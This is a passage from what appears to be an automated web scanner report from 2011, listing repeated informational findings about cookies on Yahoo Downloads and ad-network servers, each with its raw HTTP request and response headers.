<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>NetSeer Advertisement</title> <meta http-equiv="pragma" content="no-cache ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.comodo.com%2fbusiness-security%2fpci-compliance%2fpci-scan.php HTTP/1.1 Host: cspix.media6degrees.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0e3la00837010i02408; rdrlst=40415xylk60qe00000002370113bolk7p6z0000000137010znmlk346200000003370110poljyxb4000000053701; sglst=2020s0t7ljyxb408rvv00537010i02405ag3ljyxb408rvv00537010i02405; vstcnt=417k010r014uzg6118e1002
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9
Response
HTTP/1.1 302 Found Date: Tue, 26 Apr 2011 13:55:04 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://downloads.yahoo.com/windows Set-Cookie: ysf=GSNFLYCE5xfXhMgDKtDsvBAgEPqdul7F4R6eY0r3frTlNWE6qmXVAtv1CkLypFvQz0DrdSW5hE9nUKlwpRw4BWq3xtYsWXBLidy75rvVoghb9DOg8Qecuk_9UXbLn3roNKy1k2ur51WmNXH55svDTvUaF6O4kB1QMMFH2NPq4DtM7KukuSfJUufHt384c3O4yGuNm7F6A_cstJIc6UCpeGbpsYL3p41Ynmz331_Bayzp3EP.7BfHE5nGHLOZpni1kBacU8R1jHwVgvjTHEwXI66OoQFeRWeRPLb_DyBtt2CRzXLofek7cKueeEPU0kUY4K7tf9s8ligln_Rv3z6ZAWmCoFU1dKxsJynOHg_mm0odfwowntWbo9CDVF_RjscTDVDIwjhmDkZ1PduXX8GFN63QqFTGlyO8aLIbyr3eOGxiXB3T; expires=Thu, 26-Apr-2012 13:55:04 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 192
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /freeware HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.2.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:11 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=ciGdOSjH5xepaEAZS7QpAXfv98cK6F6KOcKtFsBL.zOIPQE4N3EHjPIjz9Ry0.pA_mhV2n7Jk1hw5pekH26vxKFtU5TRQQAma.hL037jgYa2PTX1V1toVMBQkwW0dgg4DfLPDcclwS0d8ZIiLUS.dMq6ZSeg6uvseIjSVaAzLU0vfSpRvMWxH3gKjA0C54a3RHQpbUeTZGL.yJk2WBR1MFBu8yCip521Ptzsm3Z3mlh3zMyVSofOpA.FJ1kwjgCkS1.NbzkgfKrwT2snB9ZepFddS4yfxXfIfiHs2KuE5RpdCYPYEjZWj4_uTK0IIeFNkv4kq82BDTkvDFePKHRvIjb9FO9fe1TrqhEzPiHz4Ap7wCfx0gOIInDXzvX_fNtQ66cXT7EGRJj4MJTsvQnxVuKHG3ztG8Lw3MufNM2i3lGi9VFA; expires=Thu, 26-Apr-2012 13:56:11 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 141230
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <META name="y_key" content="f760cc789e48a3df" /> <META name="google-site-verificati ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /linux HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.4.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:13 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=EJrvAC_B5xevrWgM3QJ9810zR4MY0ALwmL67RvYl4ACCDjj91C5QOzAKojsZVGh5deEI1hSA5VaAJUGx17h82kxoBREydbHnor1ILXmEa8wQ5wzN4VHUV6V83C2a4vsDlIosvXogdOWwmx_MnZKukNzYDLWMg3cz66FITnSnPasy1PL_qQgGs9MMdNFdMWD3boAma3XgVE4SSncKTsuYqyQkIpbMi0sZwzc3YWz07HQaL46euEfKCnnb3Vp2oCFQ5OhdtsKrJrpYOwni9u.OO4JPbknkKFpXwZGfRKqX89yug3H5GXRn_bVK1PCeOhc9M77MfjEAXiw3Y.bA7l1DQPwqaOuGRgNhxArHn7_uk._qc8vt2PpgQbMH0c51CO5tYMJBZNSpchj9e2AdYWohceMZKPxW4fzLDSBVQDqvHJZtbvVVR0TXENX_l0xFuFKDiVkkWI9_gMeWuGenxxyVzA--; expires=Thu, 26-Apr-2012 13:56:13 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 142705
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <META name="y_key" content="f760cc789e48a3df" /> <META name="google-site-verificati ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mobile HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.2.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:10 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=ofsOP8_H5xf895sWJTCd9NPX2WiBuAc7uOvkNKmiqCXeWEXt.5JJWgRWZ9jRCPYcB.3vOD1FfeTkx2jdWqUGZbqFFXzykG6SA7UxMAU82b.01IZHxh0tUWHBSA3n08efIw5qaM.ffg_vbq43qjMIBnKcfstPxGYOZcSggnL9TxHDcjJ99GtFQgcbtUEKHZ1fkIYxEusvCPp5bZI2.hOew2fKIIGI7w3CfeReG2Xu0Jmwi2fC.YchFzGWPWI_5nw6.BAzmBaXNJzz1bTr_DCy3SBGCT2DMn5D9G5JqZo4Bk6fX3Zs8Ojdpl3j7hTM5FYBdvx0VLNcFZIlOk3YrQseMxae8MRhopUnUtatVlbI4Cw5uUpj9CdikjKLeE..9R.KaGNmB9SQK_ZHdck_Ehxl_u7ZgNaW3APHvrcnb6Mx.gKKcB2XDQ2zCgx9JqmWKlWIWQC0YYBolBMwV8OqqN_iTuqnQw--; expires=Thu, 26-Apr-2012 13:56:11 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 178981
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <META name="y_key" content="f760cc789e48a3df" /> <META name="google-site-verificati ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /windows HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:55:05 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=e8hh476F5xfram8esL9uYMWUer4zVxwF9yCpDgtNY8OnYb8LD_SWa8_QLi9Zf_nIYdYzjXelUkLDzTd5b41mR1CxNhgLDeJHDzqdTA_eLB7_NzCP6Wp5J1nax6Fl7C53FlKTK3X2PDvsCY9f.C1X.bicPXpRyIP_cyXm9eGIvbxyykLRurMSQU0VWvd3X.Tvtb1_oT5ZxXajuPqdaGAOb.b4OXS02AtBEoLtP8RSAc2QL5O1mGGB9hINfdet0aGd3veAMcHbDG7KEhy9HwTlfx0IL8zE_mS3HW73sFhGOULomyXVqu3GnA4nTOqCY5E7M9MNb5RaoFPByjFgTjNrs8iFjmWFIq4uMdc5dBmcxooGV6f6fzOs87bsA3pt9yGcct.ODumZ3Gkqhu0IB.Pzes_Ys1kYrxNgn55_ms6pdomDxWcr08BuLVK.NLAlaPN3LdWDDu54bs9YvnuaK5ueLURN; expires=Thu, 26-Apr-2012 13:55:05 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 154354
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <META name="y_key" content="f760cc789e48a3df" /> <META name="google-site-verificati ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /windows/desktop-enhancements/virtual-desktop HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.5.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:18 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=gBH90to.5hf7Z2kPHVVBWT1SOsqA8znkBbhwDbdVtTDNQAnUJ2JU5sMkJoYkXjmm_JAUl0ncpuz70YW7mPjqrr5ij5IC87ycWrraNhzHrC2mTAo.wRnQRi_I2woD3u.f2KbfAH6kMJ3XcTVHbVH9MJO4JykNFL9_jvpCHC34w7ty0OXi4Pw6P1ZtfyiA2rqgVsOo9IS7gEGiiSUxMD5CsPVXKF0Er3.lwl5Vd.1HOfASbde9T7jw1q8ResrnweLIeYCAGyZx6o_IWDaZWAQu45KA.hCdcHthT46btDCeIczGSVK_3rdHcFP1SFrSHLiGSY8AfZyVZLpx3nwHu7IRdhT3coNoydg1kwsAK3uxvwmeQRPkbb4sA8_dGwNKGZvyckTkFHTUrXLQginUrM3tywEckcOI2Ou9oGcFNlOIGnh2m4yIZiLq3dDdRMkuNCmd_55TO55HJyjRYEm3ssZ2jLUS; expires=Thu, 26-Apr-2012 13:56:18 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 305086
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <META name="y_key" content="f760cc789e48a3df" /> <META name="google-site-verificati ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305 HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.1.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:08 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=xVd8BADE5xeANwBRYs5oLZOqg_4FZ6HdmpnP3mHJAK3o2rISGx9ISMjk9GKvcBYbrrAA2bDOHJ2MuK3IeVbHlBzoAS.smgIM3E6AVQQ5HGJIhLNu3IGyDfk5N.MvvnFmturIItI.TPOWyGkz9WnhF48GR79QpvqhRWFqwNP4lhdypwAsUqzy.epYzOkReKuzzAE6iVg75mlNK9L5yANHq2dI8uLRAr7WWG9Na.K__YtTRaZvZZ2r.B6gSTAygzYEueDTAy_34EUBdSTpnwgRDwM7EpBWx_BJL1B6_kPaZtES26xDZrRpq18313VM42HISJCsoKFnWDCcWGvIj9Z7EsIHQFaRktpA1DcyxuGrPZDo2jpM7MARGDfNaq17ifUVw9jfHnIhc3T2iPuHjTn6X0RP8GSV.fh1inGa5m24wd3NjtQJYVOxYZIMYnk.70uWmLX2Lg6jF3Q5XVVWfYwHDf7j; expires=Thu, 26-Apr-2012 13:56:08 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 257732
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <META name="y_key" content="f760cc789e48a3df" /> <META name="google-site-verificati ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.comodo.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fbusiness-security%2Fpci-compliance%2Fpci-scan.php&scb19p HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303662902.60|1303662902.1OD|1303662902.1FE; dt=X; uid=4dab4fa85facd099
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ab?enc=pHA9CtcjE0CkcD0K1yMTQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAcx9FGwAAAAA.&tt_code=vert-314&udj=uf%28%27a%27%2C+9797%2C+1303827657%29%3Buf%28%27c%27%2C+52368%2C+1303827657%29%3Buf%28%27r%27%2C+173252%2C+1303827657%29%3Bppv%288991%2C+%276718109068834708565%27%2C+1303827657%2C+1303870857%2C+52368%2C+25553%29%3B&cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..&referrer=http://www.spamlaws.com/spam-blocker.html&pp=TbbUyQAERXEK7FrIESl1USKqAlzx_1NgCAINaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i; path=/; expires=Mon, 25-Jul-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly Date: Tue, 26 Apr 2011 14:21:03 GMT Content-Length: 1560
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=541&size=728x90&inv_code=1712152&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1712152 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; 